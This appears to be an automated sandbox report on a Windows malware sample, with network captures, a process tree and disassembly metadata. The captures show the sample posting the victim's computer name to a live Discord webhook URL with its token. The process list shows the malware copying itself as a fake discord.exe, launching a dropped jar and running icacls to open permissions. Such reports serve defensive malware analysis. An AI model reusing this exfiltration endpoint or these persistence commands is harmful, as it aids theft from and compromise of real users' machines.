99 c9 28 32 da 44 92 c8 18 08 7d 3a 0d 87 35 c0 ea 1c 09 6f 8f 76 7b 5d 36 96 8c a3 cc c6 43 67 ef d7 83 39 d2 41 d7 d1 69 03 8e 8c 3e a7 2b b7 ec 9f 0b 1b 29 cc 24 9f 4c 30 61 17 4d 44 79 6b a8 bc 3d da 91 b7 1d 0d c6 99 c9 64 32 85 aa 3b 15 7c 3b 1b c2 21 27 ec a0 0a 83 ae 79 3b 8a 82 5e 14 74 87 84 ed 1e 23 61 92 4f 6e 09 47 dc fb 97 56 94 d6 0e 64 ce 8c 6d 4b c9 4c 13 b1 90 32 c8 b8 a3 ff 2f 2d 46 6f cd 95 8c a4 02 82 0e bf f9 03 84 bf 9e b1 99 82 3d 14 3c 04 b1 5f 98 37 9a 88 3f 36 84 a1 47 b6 40 4c d1 c3 cf 82 e1 ed ef 67 60 27 0f ad ae ae ac 0e 29 ad 08 c1 b8 29 f1 20 ad bb 55 77 51 8d f9 42 13 f1 23 f5 94 50 3d c4 7f 66 d8 0b 11 8f dc fa 2e ce 0d 17 e7 9f e5 e5 fa f4 a2 0d 37 46 72 25 6a a2 47 91 7d 54 b2 99 c9 32 e2 4d 2d bc 1c fd d4
                                                                                              Data Ascii: PK9VDIlIIlLllI/lllIlIlIlll/IIlllllIlIIl/lIlIlIIllI/IIllIllllIIlIIII.class<@G[YPDD*.xDVDJXcL11DK&$)Bxvk9>BHA@[VU^n+G(d<N+:'f3#qq#,*5RZf-qd@Erhd9c*i58!;Vd8`rpf!"rj5mnIpZ^PSZd[d2ZlCdUM/GBQjK++G-U\D{q.$Vf&Ix"Cq/B82bfrH:wN#b|e&Ib"+YgF#EpmmBwEH8avq+A$#-$#|3IH,k*3vLZ/G::V(qE$]biv;&HOWht7dl)17N;z0fHez=BFU(Pn"idG[<2lUXYQ[PZQYT)3I # #&ZS(2D}:5ov{]6Cg9Ai>+)$L0aMDyk=d2;|;!'y;^t#aOnGVdmKL2/-Fo=<_7?6G@Lg`')) UwQB#P=f.7Fr%jG}T2M-


                                                                                              HTTPS Proxied Packets

                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                              0192.168.2.449697162.159.138.232443C:\Users\user\Desktop\S3zoj9Uts0.exe
                                                                                              TimestampkBytes transferredDirectionData
                                                                                              2023-02-03 19:40:02 UTC0OUTPOST /api/webhooks/1061591881189961839/KwqGODsud5jnEMwoLx_f6PdyZpFgjhKU-fUjwmwXiSSOBri5CuGLlgGvA4a7d18uh4zS HTTP/1.1
                                                                                              Content-Type: application/json
                                                                                              Host: canary.discord.com
                                                                                              Content-Length: 62
                                                                                              Expect: 100-continue
                                                                                              Connection: Keep-Alive
                                                                                              2023-02-03 19:40:02 UTC0INHTTP/1.1 100 Continue
                                                                                              2023-02-03 19:40:02 UTC0OUTData Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 43 6f 6e 6e 65 63 74 65 64 20 46 6f 72 6d 20 41 75 74 6f 53 74 61 72 74 3a 20 20 43 6f 6d 70 75 74 65 72 2d 4e 61 6d 65 3a 36 34 32 32 39 34 22 7d
                                                                                              Data Ascii: {"content": "Connected Form AutoStart: Computer-Name:642294"}
                                                                                              2023-02-03 19:40:02 UTC0INHTTP/1.1 204 No Content
                                                                                              Date: Fri, 03 Feb 2023 19:40:02 GMT
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Connection: close
                                                                                              CF-Ray: 793da2d24c5791cf-FRA
                                                                                              Set-Cookie: __dcfduid=8d344084a3fa11edb12a467b796b8d6b; Expires=Wed, 02-Feb-2028 19:40:02 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/
                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                              Via: 1.1 google
                                                                                              CF-Cache-Status: DYNAMIC
                                                                                              Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                              X-Content-Type-Options: nosniff
                                                                                              x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                              x-ratelimit-limit: 5
                                                                                              x-ratelimit-remaining: 4
                                                                                              x-ratelimit-reset: 1675453203
                                                                                              x-ratelimit-reset-after: 1
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=wGn6yHXBAJL%2BwrmFRRnok3Z50WPvl0SmfplMEVvItb%2FCrviqsloCMN6xo%2BtLzcsmlMpWZyvyEQq1%2FdJTyHBGj%2ByhQukDRzhRhbHLpdnYt6lTODiqCgWV5X7ggNeiwZPDrt7WhA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Set-Cookie: __sdcfduid=8d344084a3fa11edb12a467b796b8d6be5ad0f4dc92308f9dfeededdc6772f9ae58494e80434a0c06e9f2171d48ea306; Expires=Wed, 02-Feb-2028 19:40:02 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/
                                                                                              Set-Cookie: __cfruid=613838f9327cc32732558283b872653ef79e9a4d-1675453202; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                              Server: cloudflare


                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                              1192.168.2.449699162.159.135.232443C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exe
                                                                                              TimestampkBytes transferredDirectionData
                                                                                              2023-02-03 19:40:18 UTC1OUTPOST /api/webhooks/1061591881189961839/KwqGODsud5jnEMwoLx_f6PdyZpFgjhKU-fUjwmwXiSSOBri5CuGLlgGvA4a7d18uh4zS HTTP/1.1
                                                                                              Content-Type: application/json
                                                                                              Host: canary.discord.com
                                                                                              Content-Length: 62
                                                                                              Expect: 100-continue
                                                                                              Connection: Keep-Alive
                                                                                              2023-02-03 19:40:18 UTC1INHTTP/1.1 100 Continue
                                                                                              2023-02-03 19:40:18 UTC1OUTData Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 43 6f 6e 6e 65 63 74 65 64 20 46 6f 72 6d 20 41 75 74 6f 53 74 61 72 74 3a 20 20 43 6f 6d 70 75 74 65 72 2d 4e 61 6d 65 3a 36 34 32 32 39 34 22 7d
                                                                                              Data Ascii: {"content": "Connected Form AutoStart: Computer-Name:642294"}
                                                                                              2023-02-03 19:40:18 UTC1INHTTP/1.1 204 No Content
                                                                                              Date: Fri, 03 Feb 2023 19:40:18 GMT
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Connection: close
                                                                                              CF-Ray: 793da3359fafbb5c-FRA
                                                                                              Set-Cookie: __dcfduid=96af45faa3fa11edbfd6467b796b8d6b; Expires=Wed, 02-Feb-2028 19:40:18 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/
                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                              Via: 1.1 google
                                                                                              CF-Cache-Status: DYNAMIC
                                                                                              Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                              X-Content-Type-Options: nosniff
                                                                                              x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                              x-ratelimit-limit: 5
                                                                                              x-ratelimit-remaining: 4
                                                                                              x-ratelimit-reset: 1675453219
                                                                                              x-ratelimit-reset-after: 1
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=I64Nu4e74kNKgDI4m9k01S4iIsyk67AWPNnAJVcUShP38W%2BFAbn9wMWcDYFWnluRuwQmsQPZiIpo4D2xtE0Ml0j9PpNiwZslH1tM3iwcCabvzscFeuj3U210Nn83E34x69y38A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Set-Cookie: __sdcfduid=96af45faa3fa11edbfd6467b796b8d6b101bb2f69dbb74e3a021e7e2a6fc2a5a8d1349f4077e9a3a61c1b77597d44192; Expires=Wed, 02-Feb-2028 19:40:18 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/
                                                                                              Set-Cookie: __cfruid=9245cd116d5b0c069445839cc4bf4f344c00ea33-1675453218; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                              Server: cloudflare


                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                              2192.168.2.449701162.159.138.232443C:\Users\user\Desktop\S3zoj9Uts0.exe
                                                                                              TimestampkBytes transferredDirectionData
                                                                                              2023-02-03 19:40:24 UTC3OUTPOST /api/webhooks/1061591881189961839/KwqGODsud5jnEMwoLx_f6PdyZpFgjhKU-fUjwmwXiSSOBri5CuGLlgGvA4a7d18uh4zS HTTP/1.1
                                                                                              Content-Type: application/json
                                                                                              Host: canary.discord.com
                                                                                              Content-Length: 62
                                                                                              Expect: 100-continue
                                                                                              Connection: Keep-Alive
                                                                                              2023-02-03 19:40:24 UTC3INHTTP/1.1 100 Continue
                                                                                              2023-02-03 19:40:24 UTC3OUTData Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 43 6f 6e 6e 65 63 74 65 64 20 46 6f 72 6d 20 41 75 74 6f 53 74 61 72 74 3a 20 20 43 6f 6d 70 75 74 65 72 2d 4e 61 6d 65 3a 36 34 32 32 39 34 22 7d
                                                                                              Data Ascii: {"content": "Connected Form AutoStart: Computer-Name:642294"}
                                                                                              2023-02-03 19:40:24 UTC3INHTTP/1.1 204 No Content
                                                                                              Date: Fri, 03 Feb 2023 19:40:24 GMT
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Connection: close
                                                                                              CF-Ray: 793da35d4d509a0f-FRA
                                                                                              Set-Cookie: __dcfduid=9a74e0d2a3fa11eda2a39a82994a9fb2; Expires=Wed, 02-Feb-2028 19:40:24 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/
                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                              Via: 1.1 google
                                                                                              CF-Cache-Status: DYNAMIC
                                                                                              Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                              X-Content-Type-Options: nosniff
                                                                                              x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                              x-ratelimit-limit: 5
                                                                                              x-ratelimit-remaining: 4
                                                                                              x-ratelimit-reset: 1675453226
                                                                                              x-ratelimit-reset-after: 1
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Ph%2BH5%2FTUGV8l83nNN95lxHSmsNgxHB4wMWpl4Jqlawl2TuslNv2uNqh2Ob6%2Ff%2FTQXxGidWtp5PYLuWxOZ5T1B33hy6f%2BTBakYMctGNTGNzqk4MAqBnb93YIi%2Byj1VxguYa3SQw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Set-Cookie: __sdcfduid=9a74e0d2a3fa11eda2a39a82994a9fb2b0830d21790567472468f571b6559ef9e036ba8b03d6effc2f0ed9c8c2b7a9fa; Expires=Wed, 02-Feb-2028 19:40:24 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/
                                                                                              Set-Cookie: __cfruid=a8d51763e2015e0ebd1626c686683ce76f32e37c-1675453224; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                              Server: cloudflare


                                                                                              Statistics

                                                                                              CPU Usage

                                                                                              Click to jump to process

                                                                                              Memory Usage

                                                                                              Click to jump to process

                                                                                              High Level Behavior Distribution

                                                                                              Click to dive into process behavior distribution

                                                                                              Behavior

                                                                                              Click to jump to process

                                                                                              System Behavior

                                                                                              General

                                                                                              Target ID:0
                                                                                              Start time:20:39:57
                                                                                              Start date:03/02/2023
                                                                                              Path:C:\Users\user\Desktop\S3zoj9Uts0.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:C:\Users\user\Desktop\S3zoj9Uts0.exe
                                                                                              Imagebase:0x1d0000
                                                                                              File size:30720 bytes
                                                                                              MD5 hash:94CCB92B775297F357670ABD1E6F754B
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:.Net C# or VB.NET
                                                                                              Reputation:low

                                                                                              General

                                                                                              Target ID:1
                                                                                              Start time:20:40:00
                                                                                              Start date:03/02/2023
                                                                                              Path:C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe" -jar "C:\Users\user\AppData\Local\Temp\jarva.jar"
                                                                                              Imagebase:0x8c0000
                                                                                              File size:192376 bytes
                                                                                              MD5 hash:4BFEB2F64685DA09DEBB95FB981D4F65
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:Java
                                                                                              Reputation:high

                                                                                              General

                                                                                              Target ID:2
                                                                                              Start time:20:40:02
                                                                                              Start date:03/02/2023
                                                                                              Path:C:\Windows\SysWOW64\icacls.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M
                                                                                              Imagebase:0xb70000
                                                                                              File size:29696 bytes
                                                                                              MD5 hash:FF0D1D4317A44C951240FAE75075D501
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high

                                                                                              General

                                                                                              Target ID:3
                                                                                              Start time:20:40:02
                                                                                              Start date:03/02/2023
                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              Imagebase:0x7ff7c72c0000
                                                                                              File size:625664 bytes
                                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high

                                                                                              General

                                                                                              Target ID:4
                                                                                              Start time:20:40:11
                                                                                              Start date:03/02/2023
                                                                                              Path:C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exe"
                                                                                              Imagebase:0x130000
                                                                                              File size:30720 bytes
                                                                                              MD5 hash:94CCB92B775297F357670ABD1E6F754B
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:.Net C# or VB.NET
                                                                                              Antivirus matches:
                                                                                              • Detection: 100%, Avira
                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                              • Detection: 29%, ReversingLabs
                                                                                              Reputation:low

                                                                                              General

                                                                                              Target ID:5
                                                                                              Start time:20:40:16
                                                                                              Start date:03/02/2023
                                                                                              Path:C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe" -jar "C:\Users\user\AppData\Local\Temp\jarva.jar"
                                                                                              Imagebase:0x8c0000
                                                                                              File size:192376 bytes
                                                                                              MD5 hash:4BFEB2F64685DA09DEBB95FB981D4F65
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high

                                                                                              General

                                                                                              Target ID:6
                                                                                              Start time:20:40:21
                                                                                              Start date:03/02/2023
                                                                                              Path:C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exe"
                                                                                              Imagebase:0xae0000
                                                                                              File size:30720 bytes
                                                                                              MD5 hash:94CCB92B775297F357670ABD1E6F754B
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:.Net C# or VB.NET
                                                                                              Reputation:low

                                                                                              General

                                                                                              Target ID:7
                                                                                              Start time:20:40:22
                                                                                              Start date:03/02/2023
                                                                                              Path:C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe" -jar "C:\Users\user\AppData\Local\Temp\jarva.jar"
                                                                                              Imagebase:0x8c0000
                                                                                              File size:192376 bytes
                                                                                              MD5 hash:4BFEB2F64685DA09DEBB95FB981D4F65
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high

                                                                                              Disassembly

                                                                                              Reset < >

                                                                                                Execution Graph

                                                                                                Execution Coverage:11.6%
                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                Signature Coverage:0%
                                                                                                Total number of Nodes:163
                                                                                                Total number of Limit Nodes:8
                                                                                                execution_graph 14196 2304230 14197 230425a 14196->14197 14198 2304309 14197->14198 14202 2304708 14197->14202 14207 23039cc 14198->14207 14200 2304584 14203 230472d 14202->14203 14211 23047f8 14203->14211 14215 2304808 14203->14215 14208 23039d7 14207->14208 14223 2306014 14208->14223 14210 2307575 14210->14200 14212 230482f 14211->14212 14213 230490c 14212->14213 14219 2303a0c 14212->14219 14216 230482f 14215->14216 14217 2303a0c CreateActCtxA 14216->14217 14218 230490c 14216->14218 14217->14218 14220 2305898 CreateActCtxA 14219->14220 14222 230595b 14220->14222 14224 230601f 14223->14224 14227 2306034 14224->14227 14226 2307655 14226->14210 14228 2306039 14227->14228 14231 2306064 14228->14231 14230 2307b4a 14230->14226 14232 230606f 14231->14232 14235 23076f0 14232->14235 14234 2307c42 14234->14230 14236 23076fb 14235->14236 14237 230839c 14236->14237 14240 230c238 14236->14240 14246 230c248 14236->14246 14237->14234 14241 230c269 14240->14241 14242 230c28d 14241->14242 14252 230c3b5 14241->14252 14257 230c3e8 14241->14257 14261 230c3f8 14241->14261 14242->14237 14247 230c269 14246->14247 14248 230c28d 14247->14248 14249 230c3b5 5 API calls 14247->14249 14250 230c3f8 5 API calls 14247->14250 14251 230c3e8 5 API calls 14247->14251 14248->14237 14249->14248 14250->14248 14251->14248 14253 230c3cb 14252->14253 14254 230c413 14252->14254 14253->14242 14255 230c39f 14254->14255 14265 230aee4 14254->14265 14255->14242 14258 230c405 14257->14258 14259 230c43f 14258->14259 14260 230aee4 5 API calls 14258->14260 14259->14242 14260->14259 14262 230c405 14261->14262 14263 230aee4 5 API calls 14262->14263 14264 230c43f 14262->14264 14263->14264 14264->14242 14266 230aee9 14265->14266 14267 230d138 14266->14267 14269 230af84 14266->14269 14270 230af8f 14269->14270 14271 23076f0 5 API calls 14270->14271 14272 230d1a7 14271->14272 14284 230d220 14272->14284 14293 230d424 14272->14293 14298 230d210 14272->14298 14273 230d1b5 14274 230cb24 GetModuleHandleW LoadLibraryExW GetModuleHandleW 14273->14274 14275 230d1cf 14274->14275 14276 230cb34 GetModuleHandleW LoadLibraryExW GetModuleHandleW 14275->14276 14277 230d1d6 14276->14277 14279 230ef02 GetModuleHandleW LoadLibraryExW GetModuleHandleW 14277->14279 14280 230ef08 GetModuleHandleW LoadLibraryExW GetModuleHandleW 14277->14280 14278 230d1e0 14278->14267 14279->14278 14280->14278 14285 230d24e 14284->14285 14286 230d31f 14285->14286 14288 230d31a KiUserCallbackDispatcher 14285->14288 14289 230d52a 14285->14289 14290 230d38b 14285->14290 14287 230cb34 GetModuleHandleW LoadLibraryExW GetModuleHandleW 14286->14287 14286->14290 14287->14290 14288->14286 14290->14289 14291 230deb0 GetModuleHandleW LoadLibraryExW GetModuleHandleW 14290->14291 14292 230dea0 GetModuleHandleW LoadLibraryExW GetModuleHandleW 14290->14292 14291->14289 14292->14289 14294 230d441 14293->14294 14295 230d52a 14294->14295 14296 230deb0 GetModuleHandleW LoadLibraryExW GetModuleHandleW 14294->14296 14297 230dea0 GetModuleHandleW LoadLibraryExW GetModuleHandleW 14294->14297 14295->14295 14296->14295 14297->14295 14299 230d225 14298->14299 14300 230d31f 14299->14300 14302 230d31a KiUserCallbackDispatcher 14299->14302 14303 230d52a 14299->14303 14304 230d38b 14299->14304 14301 230cb34 GetModuleHandleW LoadLibraryExW GetModuleHandleW 14300->14301 14300->14304 14301->14304 14302->14300 14304->14303 14305 230deb0 GetModuleHandleW LoadLibraryExW GetModuleHandleW 14304->14305 14306 230dea0 GetModuleHandleW LoadLibraryExW GetModuleHandleW 14304->14306 14305->14303 14306->14303 14307 230c510 14308 230c576 14307->14308 14309 230c625 14308->14309 14312 230c6d0 14308->14312 14315 230c6c2 14308->14315 14318 230af6c 14312->14318 14316 230c6fe 14315->14316 14317 230af6c DuplicateHandle 14315->14317 14316->14309 14317->14316 14319 230c738 DuplicateHandle 14318->14319 14320 230c6fe 14319->14320 14320->14309 14321 230a150 14325 230a238 14321->14325 14334 230a248 14321->14334 14322 230a15f 14343 230951c 14325->14343 14328 230a273 14328->14322 14329 230a26b 14329->14328 14330 230a470 GetModuleHandleW 14329->14330 14331 230a49d 14330->14331 14331->14322 14335 230a25b 14334->14335 14336 230951c GetModuleHandleW 14334->14336 14338 230a273 14335->14338 14341 230a4d0 2 API calls 14335->14341 14342 230a4c1 2 API calls 14335->14342 14336->14335 14337 230a26b 14337->14338 14339 230a470 GetModuleHandleW 14337->14339 14338->14322 14340 230a49d 14339->14340 14340->14322 14341->14337 14342->14337 14344 230a428 GetModuleHandleW 14343->14344 14346 230a25b 14344->14346 14346->14328 14347 230a4c1 14346->14347 14352 230a4d0 14346->14352 14348 230951c GetModuleHandleW 14347->14348 14349 230a4e4 14347->14349 14348->14349 14350 230a509 14349->14350 14357 2309580 14349->14357 14350->14329 14353 230951c GetModuleHandleW 14352->14353 14354 230a4e4 14353->14354 14355 230a509 14354->14355 14356 2309580 LoadLibraryExW 14354->14356 14355->14329 14356->14355 14358 230a690 LoadLibraryExW 14357->14358 14360 230a709 14358->14360 14360->14350 14361 230ed7f 14362 230ed83 14361->14362 14363 230ed1f 14361->14363 14362->14363 14365 230ed8b 14362->14365 14372 230e900 14363->14372 14367 230eea9 14365->14367 14369 230ee0a 14365->14369 14379 230ef02 14365->14379 14385 230ef08 14365->14385 14366 230ed33 14368 230e900 3 API calls 14368->14369 14369->14367 14369->14368 14373 230e90b 14372->14373 14374 230eea9 14373->14374 14376 230ee0a 14373->14376 14377 230ef02 3 API calls 14373->14377 14378 230ef08 3 API calls 14373->14378 14374->14366 14375 230e900 3 API calls 14375->14376 14376->14374 14376->14375 14377->14376 14378->14376 14381 230ef39 14379->14381 14382 230ef85 14379->14382 14380 230ef45 14380->14369 14381->14380 14391 230f388 14381->14391 14394 230f377 14381->14394 14382->14369 14387 230ef39 14385->14387 14388 230ef85 14385->14388 14386 230ef45 14386->14369 14387->14386 14389 230f377 3 API calls 14387->14389 14390 230f388 3 API calls 14387->14390 14388->14369 14389->14388 14390->14388 14392 230a248 3 API calls 14391->14392 14393 230f391 14392->14393 14393->14382 14395 230f388 14394->14395 14396 230a248 3 API calls 14395->14396 14397 230f391 14396->14397 14397->14382

                                                                                                Executed Functions

                                                                                                Function 0230A248 Relevance: 1.7, APIs: 1, Instructions: 197COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.577667065.0000000002300000.00000040.00000800.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2300000_S3zoj9Uts0.jbxd
                                                                                                Similarity
                                                                                                • API ID: HandleModule
                                                                                                • String ID:
                                                                                                • API String ID: 4139908857-0
                                                                                                • Opcode ID: 6a1d607b2baae444feb4997b858748b1c19ef7f73ce157481c8e051aed38f0f9
                                                                                                • Instruction ID: cad3cdcbda094f3e0bfdb8377240241212f7ff9b7542476f4e722ac999229db2
                                                                                                • Opcode Fuzzy Hash: 6a1d607b2baae444feb4997b858748b1c19ef7f73ce157481c8e051aed38f0f9
                                                                                                • Instruction Fuzzy Hash: 54713470A00B058FD724DF2AD09079ABBF5BF88314F108A2EE54AD7B90D775E9458FA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0230588C Relevance: 1.6, APIs: 1, Instructions: 98COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 57 230588c-2305959 CreateActCtxA 59 2305962-23059bc 57->59 60 230595b-2305961 57->60 67 23059cb-23059cf 59->67 68 23059be-23059c1 59->68 60->59 69 23059e0 67->69 70 23059d1-23059dd 67->70 68->67 72 23059e1 69->72 70->69 72->72
                                                                                                APIs
                                                                                                • CreateActCtxA.KERNEL32(?), ref: 02305949
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.577667065.0000000002300000.00000040.00000800.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2300000_S3zoj9Uts0.jbxd
                                                                                                Similarity
                                                                                                • API ID: Create
                                                                                                • String ID:
                                                                                                • API String ID: 2289755597-0
                                                                                                • Opcode ID: 41885803129c9b7bf2f63cba993bca15ed6af5aad7fdacf627541da542b9fd85
                                                                                                • Instruction ID: 59018e743cc5b78c81a400bed5cf125867ff8687102ac0bc9781a91ff9afa973
                                                                                                • Opcode Fuzzy Hash: 41885803129c9b7bf2f63cba993bca15ed6af5aad7fdacf627541da542b9fd85
                                                                                                • Instruction Fuzzy Hash: 5441D2B1C00719CFDB24CFA9C894BCEBBB2BF49314F64806AD409AB251DB755946CF91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 02303A0C Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 73 2303a0c-2305959 CreateActCtxA 76 2305962-23059bc 73->76 77 230595b-2305961 73->77 84 23059cb-23059cf 76->84 85 23059be-23059c1 76->85 77->76 86 23059e0 84->86 87 23059d1-23059dd 84->87 85->84 89 23059e1 86->89 87->86 89->89
                                                                                                APIs
                                                                                                • CreateActCtxA.KERNEL32(?), ref: 02305949
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.577667065.0000000002300000.00000040.00000800.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2300000_S3zoj9Uts0.jbxd
                                                                                                Similarity
                                                                                                • API ID: Create
                                                                                                • String ID:
                                                                                                • API String ID: 2289755597-0
                                                                                                • Opcode ID: bd72d701d3f9b34003933f1ee5c33c3d138c47cc6f07a3eef47727af78387c8b
                                                                                                • Instruction ID: 3f92c1503ba6057d740bae00fe8d41ded0431c72dfafe58ebc790fe78e612ed8
                                                                                                • Opcode Fuzzy Hash: bd72d701d3f9b34003933f1ee5c33c3d138c47cc6f07a3eef47727af78387c8b
                                                                                                • Instruction Fuzzy Hash: FB41F271C00719CBDB24CFA9C894BCEBBB5BF48314F64806AD409BB251DBB46945CFA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0230AF6C Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 90 230af6c-230c7cc DuplicateHandle 92 230c7d5-230c7f2 90->92 93 230c7ce-230c7d4 90->93 93->92
                                                                                                APIs
                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0230C6FE,?,?,?,?,?), ref: 0230C7BF
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.577667065.0000000002300000.00000040.00000800.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2300000_S3zoj9Uts0.jbxd
                                                                                                Similarity
                                                                                                • API ID: DuplicateHandle
                                                                                                • String ID:
                                                                                                • API String ID: 3793708945-0
                                                                                                • Opcode ID: 22f75b27465b9bb504417d97b199973d15ba0fac893653cf62ed9b8f581329f2
                                                                                                • Instruction ID: 0e3cb0a6e7c124acdea8af652f82c65da09696745f8a89d22e2732070506711e
                                                                                                • Opcode Fuzzy Hash: 22f75b27465b9bb504417d97b199973d15ba0fac893653cf62ed9b8f581329f2
                                                                                                • Instruction Fuzzy Hash: 1C2103B59002089FDB10CF9AD584ADEBFF8EB48324F14851AE914B3350D378A944CFA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0230C732 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 96 230c732-230c7cc DuplicateHandle 97 230c7d5-230c7f2 96->97 98 230c7ce-230c7d4 96->98 98->97
                                                                                                APIs
                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0230C6FE,?,?,?,?,?), ref: 0230C7BF
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.577667065.0000000002300000.00000040.00000800.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
